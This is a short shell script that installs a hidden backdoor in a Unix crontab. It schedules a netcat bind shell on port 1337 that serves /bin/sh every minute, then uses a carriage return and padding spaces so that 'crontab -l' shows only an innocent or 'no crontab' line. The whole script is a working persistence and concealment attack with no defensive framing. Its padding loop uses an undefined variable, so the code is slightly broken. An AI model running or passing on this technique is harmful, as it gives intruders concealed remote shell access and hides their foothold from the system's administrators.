printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -
crontab -l
no crontab for vit
Hidden backdoor:
BDOOR_PT=1337
BDOOR_SH="{ \
cd /tmp; mkfifo .i .o; \
cat .o | nc -l -p ${BDOOR_PT} > .i & \
/bin/sh < .i &>.o ; rm -f .i .o; \
}"
# scheduled task that will be hidden
HIDDEN="* * * * * ${BDOOR_SH}>/dev/null 2>&1"
# Display the current cron table and modify the first line
crontab -l 2>&1 | {
read FIRST_TASK;
if [ ${#HIDDEN} -gt ${#FIRST_TASK} ]; then
# end the first crontab line with spaces to hide our backdoor and
# one more character (";").
while (( i < (${#HIDDEN} - ${#SHOWN_TASK} + 1) )); do
FIRST_TASK="${FIRST_TASK} "; ((i++))
done
fi
# carriage return goes there ("\r")
printf "${HIDDEN};\r${FIRST_TASK}\n"; cat
} | crontab -
if [ $? -eq 0 ]; then
echo "Backdoor is now hidden in cron table"
echo "Shell will be bind on port ${BDOOR_PT}."
else
echo "Failed."
fi